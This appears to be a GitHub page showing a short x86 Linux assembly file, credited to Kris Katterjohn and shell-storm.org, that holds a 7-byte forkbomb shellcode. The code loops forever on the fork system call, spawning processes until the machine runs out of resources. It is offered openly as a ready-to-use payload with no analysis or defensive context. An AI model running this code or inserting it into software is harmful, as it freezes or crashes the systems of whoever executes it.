Permalink
Cannot retrieve contributors at this time
13 lines (10 sloc)
213 Bytes
|
; http://shell-storm.org/shellcode/files/shellcode-214.php |
|
; By Kris Katterjohn 8/29/2006 |
|
; 7 byte shellcode for a forkbomb |
|
|
|
section .text |
|
global _start |
|
|
|
_start: |
|
push byte 2 |
|
pop eax |
|
int 0x80 |
|
jmp short _start |
|
|
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session.
You signed out in another tab or window. Reload to refresh your session.